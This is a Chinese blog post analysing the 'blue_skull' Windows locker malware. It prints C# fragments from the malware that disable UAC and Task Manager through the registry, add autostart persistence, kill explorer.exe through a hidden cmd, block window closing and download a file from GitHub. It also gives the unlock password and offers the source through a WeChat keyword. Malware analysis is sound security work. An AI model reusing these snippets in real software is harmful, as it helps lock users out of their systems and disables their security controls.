Loading [MathJax]/jax/input/TeX/config.js
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >blue_skull Windows勒索恶意软件分析

blue_skull Windows勒索恶意软件分析

作者头像
用户4682003
发布于 2025-06-16 01:13:47
发布于 2025-06-16 01:13:47
9900
代码可运行
举报
运行总次数:0
代码可运行

系统功能分析

1. 系统概述

blue_skull是一个Windows平台的恶意锁定程序(Locker类型病毒),主要功能包括:

  • 强制锁定用户系统
  • 禁用任务管理器
  • 修改关键注册表项
  • 自启动持久化
  • 播放背景音乐
  • 需要输入特定密码才能解锁

2. 系统架构

3. 核心技术实现

3.1 注册表修改

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
// 禁用UAC
RegistryKey rg = Registry.LocalMachine.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System");
rg.SetValue("EnableLUA", 0, RegistryValueKind.DWord);
// 禁用任务管理器
RegistryKey fk = Registry.CurrentUser.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System");
fk.SetValue("DisableTaskMgr", 1, RegistryValueKind.DWord);
// 设置自启动
RegistryKey reg = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
reg.SetValue("blue_skull", Application.ExecutablePath.ToString());

3.2 进程控制

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
// 杀死explorer.exe
ProcessStartInfo kokot = new ProcessStartInfo();
kokot.FileName = "cmd.exe";
kokot.WindowStyle = ProcessWindowStyle.Hidden;
kokot.Arguments = @"/k taskkill /f /im explorer.exe";
Process.Start(kokot);
// 恢复explorer.exe
ProcessStartInfo kokot = new ProcessStartInfo();
kokot.FileName = "cmd.exe";
kokot.WindowStyle = ProcessWindowStyle.Hidden;
kokot.Arguments = @"/k start explorer.exe";

3.3 界面锁定

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
// 防止关闭
private void blue_skull2_FormClosing(object sender, FormClosingEventArgs e)
{
    e.Cancel = true; 
}
// 全屏透明窗口
this.TransparencyKey = this.BackColor;
this.Width = Screen.PrimaryScreen.Bounds.Width;
this.Height = Screen.PrimaryScreen.Bounds.Height;

3.4 网络功能

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
// 从GitHub下载音频文件
WebClient webClient = new WebClient();
webClient.DownloadFile("https://github.com/MalwareStudio/norm9/raw/master/norm9.wav", @"C:\norm9.wav");

4. 系统行为总结

  1. 启动阶段
    • 创建隐形全屏窗口
    • 终止explorer.exe进程
    • 修改关键注册表项
    • 下载背景音乐文件
  2. 锁定阶段
    • 显示锁定界面
    • 循环播放背景音乐
    • 拦截所有关闭尝试
  3. 解锁阶段
    • 需要输入正确密码(672349276)
    • 恢复注册表设置
    • 重启explorer.exe
    • 自我终止

    需要源代码研究的同学可以在公众号回复“blueskull”下载即可,下载的源代码可以用于编译后做二进制病毒分析跟源代码进行对比学习。但不可用于做坏事,否则后果自负。这些源代码也可以用作AI分析的元数据,喂给AI吃,等代码量足够多了,即可实现一个deepseek或者其他AI病毒分析智能体(Agent)。

注意:此分析仅用于安全研究目的,切勿用于非法用途。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-03-28,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 网络安全技术点滴分享 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
[C#][转载]注册表访问读写权限解决方法
项目 - 属性 - 安全性,“使用ClickOnce”,修改app.mainfest,再取消“使用ClickOnce”
云未归来
2025/07/18
890
[C#][转载]注册表访问读写权限解决方法
C#操作注册表全攻略
相信每个人对注册表并不陌生,在运行里面输入“regedit”就可以打开注册表编辑器了。这东西对Windows系统来说可是比较重要的,也是病毒常常会光顾的地方,比如病毒和恶意软件常常会在注册表的启动项里面写入自己的启动键值来达到自启动的目的,有些病毒还会修改注册表里面来映像劫持杀毒软件,这是破坏系统的第一步。同时,大多软件(软件的序列号和信息)和硬件信息、系统信息、安全模式等等设置都保存在这里,因此系统的健康在很大程度上要依赖注册表的健康。
SAP梦心
2022/05/07
1.3K0
C#注册表的读,写,删除,查找
C#注册表的读,写,删除,查找 using system; using system.collections; using system.configuration; using system.data; using system.web; using system.web.security; using system.web.ui; using system.web.ui.htmlcontrols; using system.web.ui.webcontrols; using sys
阳光岛主
2019/02/19
2.3K0
朝鲜APT组织Kimsuky的技术研究分析
近期,我们注意到了全球范围内国家层次的网络攻击活动频率有着大幅度增加。其中,APT34、Gamaredon和Transparent Tribe是我们在最新的几个攻击活动中发现的样本。而在这篇文章中,我们将深入分析近期一个活动比较频繁的朝鲜APT组织,该组织名为Kimsuky,我们将对其所使用的攻击技术以及样本进行深入分析。
FB客服
2020/06/03
1K0
Excel催化剂开源第4波-ClickOnce部署要点之导入数字证书及创建EXCEL信任文件夹
为了还原一个干净无侵扰的网络世界,本文将不进行大规模地分发,若您觉得此文有用,不妨小范围地分享到真正有需要的人手中
Excel催化剂
2021/08/19
4960
.NET Core 读写Windows注册表
是的,你没看错!这完全有可能!即使 .NET Core 被设计为跨平台,但这并不意味着无法使用特定于平台的API。以 Windows 注册表为例,尽管.NET Standard 不能包含这样的API。但是,仍有一种办法可以在.NET Core 应用程序中使用 Windows 注册表。
Edi Wang
2019/07/08
2.1K0
.NET Core 读写Windows注册表
禁用系统功能
# 禁用系统功能 # 1. 禁用任务管理器 //禁用 var subKey = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", RegistryKeyPermissionCheck.ReadWriteSubTree); subKey.SetValue("DisableTaskMgr", "1"); //启用 RegistryKey subKey = Re
用户1175783
2019/09/18
3.1K0
蓝队技术 | 使用Sysmon日志识别和分析Windows恶意活动
在开始本文的内容之前,我们需要先在脑海里记住以下几个问题,并带着这些问题来阅读本文:
FB客服
2024/05/17
9650
蓝队技术 | 使用Sysmon日志识别和分析Windows恶意活动
Excel催化剂开源第32波-VSTO开发的插件让WPS顺利调用的方法-注册表增加注册信息
VSTO插件开发完成后,鉴于现在WPS用户也不少,很多时候用户没办法用OFFICE软件,只能在WPS环境下办公,VSTO开发的插件,只需增加一句注册表信息,即可让WPS识别到并调用VSTO开发的功能,可能部分功能让WPS使用要考虑WPS是否有相应的API接口,这是后话,本帖给大家粘出代码及程序,让用户双击即可完成,exe封装,无需给用户注册表文件让用户畏惧或其他安全软件报警。
Excel催化剂
2021/08/19
1.6K0
Dexter恶意软件系统功能与架构分析
该恶意软件系统是一个功能复杂的恶意软件,主要用于窃取信用卡信息、远程控制受感染的机器、自我更新和持久化。系统的主要功能包括:
用户4682003
2025/06/16
620
Dexter恶意软件系统功能与架构分析
Palo Alto Networks:新型恶意软件家族Reaver与SunOrcal存在一定联系
概要 Unit 42安全小组已经发现了一种新的恶意软件家族,并将其命名为“Reaver”。研究人员表示,这一新型恶意软件与在2016年针对中国台湾地区的黑客攻击活动中所使用的恶意软件SunOrcal存在一定的联系。 根据记录在案的证据显示,SunOrcal恶意软件至少从2013年便已经开始活动。而根据某些C2元数据显示,该恶意软件甚至可能早在2010年就已经开始活跃。而到了2016年下半年,新的恶意软件家族开始呈现疯狂发展状态。经过对Reaver进行了全面分析后,我们共发现了属于三种不同版本恶意代码的十个完
FB客服
2018/02/26
9890
Palo Alto Networks:新型恶意软件家族Reaver与SunOrcal存在一定联系
Windows中常见后门持久化方法总结
当我们通过各种方法拿到一个服务器的权限的时候,我们下一步要做的就是后渗透了,而后门持久化也是我们后渗透很重要的一部分,下面我来总结一下windows下常见的后门持久化的方法
HACK学习
2019/10/09
3K0
Windows中常见后门持久化方法总结
【玩转腾讯云】Windows云服务器排障思路
Windows排障对我来说很简单,毕竟是鼠标操作,而且有那么多小工具辅助排障,非常轻松。本文更偏重通用能力,不仅适用腾讯云,其他云也适用。专对腾讯云的话,推荐我写的一篇腾讯云SDK踩坑、填坑的文档,那个花了我上百个小时,是我10篇云+社区文档的集锦,腾讯云API Explorer工具的基本用法,让你熟练掌握6种SDK的使用。
Windows技术交流
2020/04/22
7.5K0
Sodinokibi(aka REvil)勒索软件
Sodinokibi(又名REvil)在过去的几年里一直是最多产的勒索软件即服务(RaaS)组织之一。据称,这一勒索软件家族是Travelex 入侵事件的幕后黑手,目前的报道指出,针对Acer(宏碁)的一次攻击,要求支付5000万美元的赎金。
Al1ex
2021/07/21
1.5K0
Sodinokibi(aka REvil)勒索软件
WPF桌面端开发-音视频录制(使用ffmpeg.exe实现)
本文只考虑在Windows下使用FFmpeg进行桌面、麦克风、扬声器同时录制的实现方式,Mac下会有些许差异。
码客说
2023/08/10
9030
windows bat批处理基础命令学习教程「建议收藏」
前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默,分享一下给大家。点击跳转到教程。
全栈程序员站长
2022/09/23
19.7K0
WSP ( CVE-2022-24934 ) APT
我们最近发现了一个APT我们正在调用的活动Operation Dragon Castling。该活动的目标是似乎在投注的公司South East Asia,更具体地说是位于Taiwan、Philippines和的公司Hong Kong。有了适度的信心,我们可以将活动归因于一个Chinese speaking APT group,但不幸的是不能将攻击归因于特定的群体,并且不确定攻击者的目标是什么。
Khan安全团队
2022/03/25
4.9K1
[AI安全论文] 21.S&P21 Survivalism经典离地攻击(Living-Off-The-Land)恶意软件系统分析
前一篇是RAID 2019的Android数据泄露分析的译文,是对真实移动设备用户网络流量的实证评估,预测用户兴趣点(POI)的位置。这篇文章将带来S&P21的离地攻击(Living-Off-The-Land)系统分析,这是一篇非常经典的论文,并且系统性分析文章是另一种讲故事的方式。一方面自己英文太差,只能通过最土的办法慢慢提升,另一方面是自己的个人学习笔记,并分享出来希望大家批评和指正。希望这篇文章对您有所帮助,这些大佬是真的值得我们去学习,献上小弟的膝盖~fighting!
Eastmount
2022/08/31
7240
Windows 权限提升
本篇内容是内网安全攻防:渗透测试实战指南时的阅读笔记,笔记大部分内容均来自此书,另外一部分来源于一些公开文档和非公开文档,参考链接中均有注明。
重生信息安全
2020/07/15
4K0
Windows 权限提升
渗透测试与开发技巧
https://github.com/3gstudent/Pentest-and-Development-Tips
天钧
2021/01/05
4.8K0
相关推荐
[C#][转载]注册表访问读写权限解决方法
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验